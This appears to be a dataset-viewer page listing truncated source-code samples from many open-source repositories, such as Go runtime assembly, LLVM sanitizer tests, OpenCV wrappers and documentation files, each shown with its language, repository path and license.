// B instruction branches to callbackasm... | GAS | 2 | Havoc-OS/androidprebuilts_go_linux-x86 | src/runtime/zcallback_windows_arm.s | [
"BSD-3-Clause"
] |
# Test that -j2 really gives us parallel builds with their own tokens.
# (It's hard to test for sure that we have our own tokens, but if we're
# sharing with other tests, we can't be sure that parallel2 will run while
# parallel is running, and the race condition will make this test at least
# be flakey instead of pass... | Stata | 3 | BlameJohnny/redo | t/010-jobserver/paralleltest.do | [
"Apache-2.0"
] |
%%%
%%% Authors:
%%% Christian Schulte <schulte@ps.uni-sb.de>
%%%
%%% Copyright:
%%% Christian Schulte, 1997, 1998
%%%
%%% Last change:
%%% $Date$ by $Author$
%%% $Revision$
%%%
%%% This file is part of Mozart, an implementation
%%% of Oz 3
%%% http://www.mozart-oz.org
%%%
%%% See the file "LICENSE" or
%%% ... | Oz | 3 | Ahzed11/mozart2 | platform-test/fd/distribute.oz | [
"BSD-2-Clause"
] |
ball_height = 56;
top_radius = 20;
head_minkow = 3;
threw_hole = 11;
minkowski(){
difference(){
sphere(r=top_radius);
cylinder(r=9, h=top_radius);
for(i=[0:72:360]){
rotate([0,60,i])
cylinder(r=9, h=top_radius);
// rotate([0,120,i])
// cylinde... | OpenSCAD | 4 | winksaville/curv | ideas/sketches/Caitlin.scad | [
"Apache-2.0"
] |
; RUN: opt < %s -msan-check-access-address=0 -S -passes=msan 2>&1 | FileCheck \
; RUN: %s
; RUN: opt < %s -msan -msan-check-access-address=0 -S | FileCheck %s
; RUN: opt < %s -msan-check-access-address=0 -msan-track-origins=1 -S \
; RUN: -passes=msan 2>&1 | FileCheck %s "--check-prefixes=CHECK,CHECK-ORIGIN"
;... | LLVM | 4 | medismailben/llvm-project | llvm/test/Instrumentation/MemorySanitizer/masked-store-load.ll | [
"Apache-2.0"
] |
//
// MatOfPoint2f.mm
//
// Created by Giles Payne on 2019/12/27.
//
#import "MatOfPoint2f.h"
#import "Range.h"
#import "Point2f.h"
#import "CvType.h"
#import "ArrayUtil.h"
@implementation MatOfPoint2f
static const int _depth = CV_32F;
static const int _channels = 2;
#ifdef __cplusplus
- (instancetype)initWithNat... | Objective-C++ | 4 | artun3e/opencv | modules/core/misc/objc/common/MatOfPoint2f.mm | [
"BSD-3-Clause"
] |
command to run test
require './compiler'
(require './compiler').reload()
root = require?('./docOrg') ? Org
reloadAll = false
{
orgDoc,
parseOrgMode,
} = root
{CoffeeScript:cs} = require?('./coffee-script') ? CoffeeScript
_L = require?('./lazy') ? Lazy
yaml = require?('./yaml')... | Literate CoffeeScript | 5 | zot/Leisure | METEOR-OLD/packages/org/compiler.litcoffee | [
"Zlib"
] |
/**
* This file is part of the Phalcon Framework.
*
* (c) Phalcon Team <team@phalcon.io>
*
* For the full copyright and license information, please view the LICENSE.txt
* file that was distributed with this source code.
*
* Implementation of this file has been influenced by AtlasPHP
*
* @link https://gith... | Zephir | 5 | tidytrax/cphalcon | phalcon/DataMapper/Pdo/Connection/ConnectionInterface.zep | [
"BSD-3-Clause"
] |
{% zone "Header" %}
<!-- Page Header -->
<!-- Set your background image for this header on the line below. -->
{% assign imagePath = Model.ContentItem.Content.BlogPost.Image.Paths.first %}
{% if imagePath == nil %}
<header class="masthead" style="background-image: url('{{ "~/TheBlogTheme/assets/... | Liquid | 4 | dev-hyang/OrchardCore | src/OrchardCore.Themes/TheBlogTheme/Views/Content-BlogPost.liquid | [
"BSD-3-Clause"
] |
- dashboard: weekly_retention_chart
title: Weekly Retention Chart
layout: newspaper
elements:
- title: 12-Week Retention Chart
name: 12-Week Retention Chart
model: braze_currents_block_customer_behavior
explore: users_behaviors_app_sessionstart
type: table
fields:
- users_behaviors_app_f... | LookML | 4 | looker-open-source/braze_retention_block | weekly_retention_chart.dashboard.lookml | [
"MIT"
] |
/*--------------------------------------------------*/
/* SAS Programming for R Users - code for exercises */
/* Copyright 2016 SAS Institute Inc. */
/*--------------------------------------------------*/
/*SP4R04d03*/
/*Part A*/
data sp4r.sales;
call streaminit(123);
do month=1 to 12;
reve... | SAS | 4 | snowdj/sas-prog-for-r-users | code/SP4R04d03.sas | [
"CC-BY-4.0"
] |
/* Copyright (c) 2017-2019 Netronome Systems, Inc. All rights reserved.
*
* @file test.uc
* @brief Microcode unit test library functions
*
* SPDX-License-Identifier: BSD-2-Clause
*/
#ifndef __TEST_UC
#define __TEST_UC
#include <stdmac.uc>
#macro test_pass()
local_csr_wr[MAILBOX_0, 0x01]
ctx_arb[k... | UnrealScript | 4 | pcasconnetronome/nic-firmware | test/lib/test.uc | [
"BSD-2-Clause"
] |
:mod:`heapq` --- Heap queue algorithm
=====================================
.. module:: heapq
:synopsis: Heap queue algorithm (a.k.a. priority queue).
.. moduleauthor:: Kevin O'Connor
.. sectionauthor:: Guido van Rossum <guido@python.org>
.. sectionauthor:: François Pinard
.. sectionauthor:: Raymond Hettinger
**S... | reStructuredText | 5 | shawwn/cpython | Doc/library/heapq.rst | [
"0BSD"
] |
= LMAX Disruptor User Guide
:Author: LMAX Development Team
:Email:
:Date: {docdata}
// If you're changing these, also check out asciidoctor.gradle!
:xrefstyle: short
:icons: font
:gradle-rootdir: ../../../../../
The LMAX Disruptor is a high performance inter-thread messaging library. It grew out of LMAX's research i... | AsciiDoc | 3 | Demoncloudy/disruptor | src/docs/asciidoc/en/user-guide/index.adoc | [
"Apache-2.0"
] |
//
// Size2i.mm
//
// Created by Giles Payne on 2019/10/06.
//
#import "Size2i.h"
#import "Point2i.h"
#import "CVObjcUtil.h"
@implementation Size2i {
cv::Size2i native;
}
- (int)width {
return native.width;
}
- (void)setWidth:(int)val {
native.width = val;
}
- (int)height {
return native.height;
... | Objective-C++ | 4 | artun3e/opencv | modules/core/misc/objc/common/Size2i.mm | [
"BSD-3-Clause"
] |
# Copyright 2019 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to ... | PowerShell | 5 | columbus9963/kubernetes | cluster/gce/windows/testonly/install-ssh.psm1 | [
"Apache-2.0"
] |
= Documentation for WebAuthn Login Feature
The webauthn feature implements passwordless authentication via
WebAuthn. It depends on the login and webauthn features.
== Auth Value Methods
webauthn_login_error_flash :: The flash error to show if there is a failure during passwordless login via WebAuthn.
webauthn_login_... | RDoc | 3 | monorkin/rodauth | doc/webauthn_login.rdoc | [
"MIT"
] |
(def cat args
(apply string "" args))
(def scat args
(sym:cat args))
(= term*
(obj colors (obj
black 0
red 1
green 2
yellow 3
blue 4
magenta 5
cyan ... | Arc | 4 | SoloBSD/QuantumNews | colors.arc | [
"MIT"
] |
## Licensed to Cloudera, Inc. under one
## or more contributor license agreements. See the NOTICE file
## distributed with this work for additional information
## regarding copyright ownership. Cloudera, Inc. licenses this file
## to you under the Apache License, Version 2.0 (the
## "License"); you may not use this f... | Mako | 5 | yetsun/hue | apps/beeswax/src/beeswax/templates/create_table_statement.mako | [
"Apache-2.0"
] |
#!/usr/bin/perl
print "Refresh: 0; url=./navigation-chain3.pl\r\n";
print "Content-type: text/html\r\n\r\n";
| Perl | 3 | zealoussnow/chromium | third_party/blink/web_tests/http/tests/inspector-protocol/page/resources/navigation-chain2.pl | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
To get started, type one of these: helpwin, helpdesk, or demo.
For product information, visit www.mathworks.com.
===============================================
>> example1.json
{
"data": {
"firstName": "John",
"lastName": "Smith",
"age": [25],
"address": {
"streetAddress": "21 2nd Street",
"city... | Matlab | 3 | DevangS/CoralNet | vision_backend_code/current_matlab/jsonlab/examples/jsonlab_selftest.matlab | [
"BSD-2-Clause"
] |
; v0.0.60
[Components]
Name: "ole\oledump"; Description: "oledump"; Types: full;
[Files]
Source: "{#MySrcDir}\ole\oledump\*"; DestDir: "{app}\programming\winpython\scripts\oldeump"; Components: "ole\oledump"; Flags: ignoreversion recursesubdirs createallsubdirs | Inno Setup | 2 | reckdo/retoolkit | src/installer/ole/oledump.iss | [
"Apache-2.0"
] |
# Copyright (c) 2022 Fyde Innovations Limited and the openFyde Authors.
# Distributed under the license specified in the root directory of this project.
EAPI="5"
DESCRIPTION="A simple script to edit config.txt in efi partition"
HOMEPAGE="https://fydeos.com"
LICENSE="BSD-Google"
SLOT="0"
KEYWORDS="*"
IUSE=""
RDEPEND... | Gentoo Ebuild | 4 | FydeOS/chromium_os_for_raspberry_pi | project-cros-pi/chromeos-base/edit-pi-config/edit-pi-config-0.0.1.ebuild | [
"BSD-2-Clause"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.